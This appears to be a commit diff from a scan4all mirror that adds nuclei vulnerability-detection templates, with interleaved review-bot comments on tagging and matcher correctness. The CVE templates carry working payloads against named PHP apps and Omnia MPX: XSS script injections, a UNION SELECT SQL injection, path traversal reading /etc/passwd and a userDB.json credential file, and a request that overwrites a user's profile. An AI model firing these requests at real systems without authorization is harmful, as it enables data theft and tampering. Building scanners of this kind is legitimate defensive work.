Projects STRLCPY scan4all Commits 4bce01c1
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2014/CVE-2014-8676.yaml
    skipped 15 lines
    16 16   cvss-score: 5.3
    17 17   cve-id: CVE-2014-8676
    18 18   cwe-id: CWE-22
    19  - tags: cve,cve2014,soplanning,lfi,packetstorm
     19 + tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
    20 20   
    21 21  requests:
    22 22   - method: GET
    skipped 13 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-42663.yaml
     1 +id: CVE-2021-42663
     2 + 
     3 +info:
     4 + name: Online Event Booking and Reservation System version 2.3.0 - Cross Site Scripting
     5 + author: fxploit
     6 + severity: medium
     7 + description: |
     8 + An HTML injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link he will display the content of the HTML code of the attacker's choice.
     9 + reference:
     10 + - https://github.com/0xDeku/CVE-2021-42663
     11 + - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-42663
     13 + - https://github.com/TheHackingRabbi/CVE-2021-42663
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
     16 + cvss-score: 4.3
     17 + cve-id: CVE-2021-42663
     18 + cwe-id: CWE-79
     19 + metadata:
     20 + verified: "true"
     21 + tags: cve,cve2021,xss
     22 + 
     23 +requests:
     24 + - raw:
     25 + - |
     26 + POST /login.php HTTP/1.1
     27 + Host: {{Hostname}}
     28 + Content-Type: application/x-www-form-urlencoded
     29 + 
     30 + name={{username}}&pwd={{password}}
     31 + 
     32 + - |
     33 + GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
     34 + Host: {{Hostname}}
     35 + 
     36 + redirects: true
     37 + max-redirects: 2
     38 + cookie-reuse: true
     39 + matchers-condition: and
     40 + matchers:
     41 + - type: word
     42 + part: body
     43 + words:
     44 + - "</i><script>alert(document.domain)</script></div>"
     45 + 
     46 + - type: word
     47 + part: header
     48 + words:
     49 + - text/html
     50 + 
     51 + - type: status
     52 + status:
     53 + - 200
     54 + 
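Review bot: the tags line (line 21) omits authenticated although the first raw request logs in with name={{username}}&pwd={{password}}; the CVE-2021-42667 template in this same commit carries that tag for the same login step. Add authenticated so the template can be filtered correctly when no credentials are supplied. The name says Cross Site Scripting while the description calls it HTML injection via msg to /event-management/index.php, and the request targets /views/index.php; align the name, description and path.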
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-42667.yaml
     1 +id: CVE-2021-42667
     2 + 
     3 +info:
     4 + name: Online Event Booking and Reservation System version 2.3.0 - SQL injection
     5 + author: fxploit
     6 + severity: critical
     7 + description: |
     8 + A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.
     9 + reference:
     10 + - https://github.com/0xDeku/CVE-2021-42667
     11 + - https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-42667
     13 + - https://github.com/TheHackingRabbi/CVE-2021-42667
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     16 + cvss-score: 9.8
     17 + cve-id: CVE-2021-42667
     18 + cwe-id: CWE-89
     19 + metadata:
     20 + verified: "true"
     21 + tags: cve,cve2021,sqli,authenticated
     22 + 
     23 +variables:
     24 + num: "999999999"
     25 + 
     26 +requests:
     27 + - raw:
     28 + - |
     29 + POST /login.php HTTP/1.1
     30 + Host: {{Hostname}}
     31 + Content-Type: application/x-www-form-urlencoded
     32 + 
     33 + name={{username}}&pwd={{password}}
     34 + 
     35 + - |
     36 + GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1
     37 + Host: {{Hostname}}
     38 + 
     39 + redirects: true
     40 + max-redirects: 2
     41 + cookie-reuse: true
     42 + matchers-condition: and
     43 + matchers:
     44 + - type: word
     45 + part: body
     46 + words:
     47 + - '{{md5(num)}}'
     48 + 
     49 + - type: status
     50 + status:
     51 + - 200
     52 + 
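Review bot: both raw requests hardcode root-relative paths (/login.php on line 29 and /views/?v=USER&ID=... on line 36), while the description places the vulnerable code under event-management/views, so an installation served from an /event-management/ directory would not be reached. Either state the assumed install path in the description or add the prefixed path as a second variant. The classification also gives PR:N while the template needs a login and is tagged authenticated; a short YAML comment explaining that difference would help whoever triages the result.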
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-29004.yaml
     1 +id: CVE-2022-29004
     2 +
     3 +info:
     4 + name: Diary Management System v1.0 - Cross-Site scripting
     5 + author: TenBird
     6 + severity: medium
     7 + description: |
     8 + Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.
     9 + reference:
     10 + - https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt
     11 + - https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29004
     13 + classification:
     14 + cve-id: CVE-2022-29004
     15 + metadata:
     16 + verified: true
     17 + tags: cve,cve2022,xss,authenticated,edms
     18 +
     19 +requests:
     20 + - raw:
     21 + - |
     22 + POST /edms/login.php HTTP/1.1
     23 + Host: {{Hostname}}
     24 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     25 +
     26 + logindetail={{username}}&userpassword={{password}}&login=
     27 +
     28 + - |
     29 + POST /edms/search-result.php HTTP/1.1
     30 + Host: {{Hostname}}
     31 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     32 +
     33 + searchdata=<script>alert(document.domain);</script>
     34 +
     35 + cookie-reuse: true
     36 + matchers-condition: and
     37 + matchers:
     38 + - type: word
     39 + part: body
     40 + words:
     41 + - 'Serach Result Against "<script>alert(document.domain);</script>'
     42 +
     43 + - type: word
     44 + part: header
     45 + words:
     46 + - text/html
     47 +
     48 + - type: status
     49 + status:
     50 + - 200
     51 + 
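Review bot: the body matcher on line 41 depends on the misspelled string Serach Result Against; if that is the application's literal output, say so in a YAML comment so nobody corrects the spelling later and silently breaks the match, and if it is not, the matcher can never fire. The description names the Name parameter while the request on line 33 sends searchdata, which needs the same clarification. The classification block has only cve-id, where the 2021 templates in this commit also carry cvss-metrics, cvss-score and cwe-id.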
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-29005.yaml
     1 +id: CVE-2022-29005
     2 +info:
     3 + name: Online Birth Certificate System V1.2 - Stored Cross-Site scripting
     4 + author: TenBird
     5 + severity: medium
     6 + description: |
     7 + Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.
     8 + reference:
     9 + - https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt
     10 + - https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2022-29005
     12 + classification:
     13 + cve-id: CVE-2022-29005
     14 + metadata:
     15 + verified: true
     16 + tags: cve,cve2022,xss,obcs,authenticated
     17 +
     18 +requests:
     19 + - raw:
     20 + - |
     21 + POST /obcs/user/login.php HTTP/1.1
     22 + Host: {{Hostname}}
     23 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     24 +
     25 + mobno={{username}}&password={{password}}&login=
     26 +
     27 + - |
     28 + POST /obcs/user/profile.php HTTP/1.1
     29 + Host: {{Hostname}}
     30 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     31 +
     32 + fname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=
     33 +
     34 + - |
     35 + GET /obcs/user/dashboard.php HTTP/1.1
     36 + Host: {{Hostname}}
     37 +
     38 + req-condition: true
     39 + redirects: true
     40 + max-redirects: 2
     41 + cookie-reuse: true
     42 + matchers:
     43 + - type: dsl
     44 + dsl:
     45 + - 'contains(all_headers_3, "text/html")'
     46 + - 'status_code_3 == 200'
     47 + - contains(body_3, 'admin-name\">nuclei<script>alert(document.domain);</script>')
     48 + condition: and
     49 + 
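Review bot: the second request (lines 27-32) changes state on the target: it overwrites the logged-in user's fname, lname and add fields and leaves the script payload stored in the profile, yet nothing in info marks the template as state-changing. Add the intrusive tag and mention the profile overwrite in the description so operators can exclude it from routine scans and know the profile needs restoring afterwards. Minor: the third dsl entry on line 47 is an unquoted YAML scalar containing \" while the other two entries are single-quoted; quote it consistently, and put a blank line between id and info as the other templates do.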
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-36642.yaml
     1 +id: CVE-2022-36642
     2 + 
     3 +info:
     4 + name: Omnia MPX 1.5.0+r1 - Path Traversal
     5 + author: arafatansari,ritikchaddha,For3stCo1d
     6 + severity: high
     7 + description: |
     8 + A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.
     9 + reference:
     10 + - https://www.exploit-db.com/exploits/50996
     11 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36642
     12 + - https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd
     13 + classification:
     14 + cve-id: CVE-2022-36642
     15 + metadata:
     16 + verified: true
     17 + shodan-query: http.title:"Omnia MPX Node | Login"
     18 + tags: cve,cve2022,lfi,traversal,omnia
     19 + 
     20 +requests:
     21 + - method: GET
     22 + path:
     23 + - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
     24 + - "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
     25 + 
     26 + stop-at-first-match: true
     27 + matchers-condition: or
     28 + matchers:
     29 + - type: regex
     30 + regex:
     31 + - "root:[x*]:0:0"
     32 + 
     33 + - type: word
     34 + part: body
     35 + words:
     36 + - '"username":'
     37 + - '"password":'
     38 + - '"mustChangePwd":'
     39 + - '"roleUser":'
     40 + condition: and
     41 + 
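Review bot: the regex matcher on lines 29-31 has no part, unlike every other matcher in this commit, and the classification block has only cve-id for a finding rated high. Add part: body to the regex matcher and fill in cvss-metrics, cvss-score and cwe-id from the NVD entry. The name says Path Traversal while the description says local file disclosure; use one term in both places.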
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/appsmith-web-login.yaml
     1 +id: appsmith-web-login
     2 + 
     3 +info:
     4 + name: Appsmith Web Log In Panel
     5 + author: powerexploit
     6 + severity: info
     7 + description: Appsmith is a low code, open-source developer tool to build internal applications quickly. You can drag and drop pre-built widgets to build UI on a grid-style canvas.
     8 + reference:
     9 + - https://www.appsmith.com
     10 + metadata:
     11 + verified: true
     12 + shodan-query: http.title:"appsmith"
     13 + tags: panel,appsmith
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}/user/login"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + part: body
     24 + words:
     25 + - "<title>Appsmith</title>"
     26 + 
     27 + - type: status
     28 + status:
     29 + - 200
     30 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposures/logs/redis-exception-error.yaml
     1 +id: redis-exception-error
     2 + 
     3 +info:
     4 + name: Redis Exception Connection Error Page
     5 + author: DhiyaneshDk
     6 + severity: low
     7 + reference:
     8 + - https://www.facebook.com/ExWareLabs/photos/pcb.5563308760399619/5563307330399762/
     9 + metadata:
     10 + verified: true
     11 + shodan-query: html:"redis.exceptions.ConnectionError"
     12 + tags: exposure,redis,logs
     13 + 
     14 +requests:
     15 + - method: GET
     16 + path:
     17 + - "{{BaseURL}}"
     18 + 
     19 + matchers-condition: and
     20 + matchers:
     21 + - type: word
     22 + part: body
     23 + words:
     24 + - 'redis.exceptions.ConnectionError'
     25 + 
     26 + - type: word
     27 + part: header
     28 + words:
     29 + - text/plain
     30 + 
     31 + - type: status
     32 + status:
     33 + - 500
     34 + 
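Review bot: info has no description, and the only reference (line 8) is a Facebook photo link, so a result gives the reader no explanation of why a page containing redis.exceptions.ConnectionError is rated low rather than info. Add a description stating what the error page discloses and what the owner should do about it, and prefer a reference that will still resolve later.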
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/aws-xray-application.yaml
     1 +id: aws-xray-application
     2 + 
     3 +info:
     4 + name: AWS X-Ray Sample Application
     5 + author: DhiyaneshDk
     6 + severity: info
     7 + description: AWS X-Ray is a service that helps developers analyze and debug distributed applications.
     8 + reference:
     9 + - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5566269380103557/
     10 + metadata:
     11 + verified: true
     12 + shodan-query: title:"AWS X-Ray Sample Application"
     13 + tags: misconfig,aws,x-ray,amazon
     14 + 
     15 +requests:
     16 + - method: GET
     17 + path:
     18 + - "{{BaseURL}}"
     19 + 
     20 + matchers-condition: and
     21 + matchers:
     22 + - type: word
     23 + part: body
     24 + words:
     25 + - '<title>AWS X-Ray Sample Application</title>'
     26 + 
     27 + - type: word
     28 + part: header
     29 + words:
     30 + - text/html
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/ec2-instance-information.yaml
     1 +id: ec2-instance-information
     2 + 
     3 +info:
     4 + name: EC2 Instance Information
     5 + author: DhiyaneshDk
     6 + severity: low
     7 + reference:
     8 + - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5567070616690100/
     9 + metadata:
     10 + verified: true
     11 + shodan-query: title:"EC2 Instance Information"
     12 + tags: misconfig,ec2,aws,amazon
     13 + 
     14 +requests:
     15 + - method: GET
     16 + path:
     17 + - "{{BaseURL}}"
     18 + 
     19 + matchers-condition: and
     20 + matchers:
     21 + - type: word
     22 + part: body
     23 + words:
     24 + - '<title>EC2 Instance Information</title>'
     25 + 
     26 + - type: word
     27 + part: header
     28 + words:
     29 + - text/html
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/graphql/graphql-playground.yaml
     1 +id: graphql-playground
     2 + 
     3 +info:
     4 + name: GraphQL Playground
     5 + author: DhiyaneshDk
     6 + severity: unknown
     7 + reference:
     8 + - https://github.com/graphql/graphql-playground
     9 + metadata:
     10 + verified: true
     11 + shodan-query: title:"GraphQL Playground"
     12 + tags: misconfig,graphql
     13 + 
     14 +requests:
     15 + - method: GET
     16 + path:
     17 + - "{{BaseURL}}"
     18 + 
     19 + matchers-condition: and
     20 + matchers:
     21 + - type: word
     22 + part: body
     23 + words:
     24 + - '<title>GraphQL playground</title>'
     25 + 
     26 + - type: word
     27 + part: header
     28 + words:
     29 + - text/html
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 
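Review bot: the body matcher on line 24 looks for <title>GraphQL playground</title> with a lowercase p, while the name and the shodan-query both use GraphQL Playground; word matchers are case-sensitive by default, so confirm the title against a real instance or set case-insensitive: true on that matcher. severity: unknown on line 6 and the missing description also leave the finding unrated and unexplained, where the neighbouring misconfiguration templates use info or low.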
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/misconfiguration/hivequeue-agent.yaml
     1 +id: hivequeue-agent
     2 + 
     3 +info:
     4 + name: HiveQueue Agent
     5 + author: DhiyaneshDk
     6 + severity: low
     7 + reference:
     8 + - https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5555061814557647/
     9 + metadata:
     10 + verified: true
     11 + shodan-query: http.title:"HiveQueue"
     12 + tags: misconfig,hivequeue
     13 + 
     14 +requests:
     15 + - method: GET
     16 + path:
     17 + - "{{BaseURL}}/monitoring"
     18 + 
     19 + matchers-condition: and
     20 + matchers:
     21 + - type: word
     22 + part: body
     23 + words:
     24 + - '<title>HiveQueue Agent</title>'
     25 + 
     26 + - type: word
     27 + part: header
     28 + words:
     29 + - text/html
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 